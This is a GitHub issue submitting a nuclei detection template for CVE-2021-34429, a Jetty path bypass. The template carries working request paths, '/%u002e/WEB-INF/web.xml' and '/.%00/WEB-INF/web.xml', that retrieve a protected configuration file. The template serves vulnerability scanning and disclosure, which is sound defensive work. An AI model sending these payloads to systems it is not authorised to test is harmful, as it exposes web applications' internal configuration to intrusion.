### ISSUE TITLE
[nuclei-template] CVE-2021-34429

### ISSUE THREAD

**Issue by bernardofsr** [projectdiscovery/nuclei-templates#2114]
**Template Details**
The default compliance mode allows requests with URIs that contain a %u002e segment to access protected resources within the WEB-INF directory. For example, a request to /%u002e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.

```yaml
id: CVE-2021-34429
info:
  name: Jetty - Path Security Bypass
  author: Bernardo Rodrigues @bernardofsr | André Monteiro @am0nt31r0 
  severity: Medium
  tags: config,exposure,cve,cve2021,jetty
  reference: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm

requests:
  - method: GET
    path:
      - '{{BaseURL}}/%u002e/WEB-INF/web.xml'
      - '{{BaseURL}}/.%00/WEB-INF/web.xml'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - <web-app>
          - </web-app>
        condition: or

      - type: status
        status:
          - 200
```
